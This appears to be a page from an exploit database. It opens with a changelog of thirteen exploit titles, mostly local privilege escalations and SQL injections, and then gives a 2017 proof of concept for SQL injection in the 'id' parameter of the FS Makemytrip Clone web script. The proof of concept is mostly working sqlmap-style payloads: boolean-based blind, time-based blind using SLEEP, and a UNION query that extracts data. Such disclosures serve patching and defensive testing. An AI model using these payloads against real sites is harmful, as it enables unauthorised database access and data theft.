
13 changes to exploits/shellcodes Arq 5.9.7 - Local Privilege Escalation Murus 1.4.11 - Local Privilege Escalation Arq 5.9.6 - Local Privilege Escalation Hashicorp vagrant-vmware-fusion 5.0.3 - Local Privilege Escalation Hashicorp vagrant-vmware-fusion 5.0.1 - Local Privilege Escalation Sera 1.2 - Local Privilege Escalation / Password Disclosure Hashicorp vagrant-vmware-fusion 5.0.0 - Local Privilege Escalation Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation Hashicorp vagrant-vmware-fusion 4.0.23 - Local Privilege Escalation Proxifier for Mac 2.19 - Local Privilege Escalation FS Makemytrip Clone - 'id' SQL Injection WinduCMS 3.1 - Local File Disclosure FS Shaadi Clone - 'token' SQL Injection
26 lines
No EOL
838 B
Text
26 lines
No EOL
838 B
Text
# Exploit Title: FS Makemytrip Clone - SQL Injection
|
|
# Date: 2017-12-05
|
|
# Exploit Author: Dan°
|
|
# Vendor Homepage: https://fortunescripts.com/
|
|
# Software Link: https://fortunescripts.com/product/makemytrip-clone/
|
|
# Version: 2017-12-05
|
|
# Tested on: Kali Linux 2.0
|
|
|
|
(PoC):
|
|
SQL Injection on GET parameter = id
|
|
http://localhost/pages.php?id=
|
|
|
|
---
|
|
Parameter: id (GET)
|
|
Type: boolean-based blind
|
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
|
Payload: id=1 AND 2990=2990
|
|
Type: AND/OR time-based blind
|
|
Title: MySQL >= 5.0.12 OR time-based blind
|
|
Payload: id=1 OR SLEEP(5)
|
|
Type: UNION query
|
|
Title: Generic UNION query (NULL) - 4 columns
|
|
Payload: id=-4648 UNION ALL SELECT
|
|
NULL,NULL,CONCAT(0x716b767a71,0x47714f5a66644664796a6a426879674757634b707753727544424f616944536d4d70655276565854,0x7178627171),NULL--
|
|
YbYU
|
|
--- |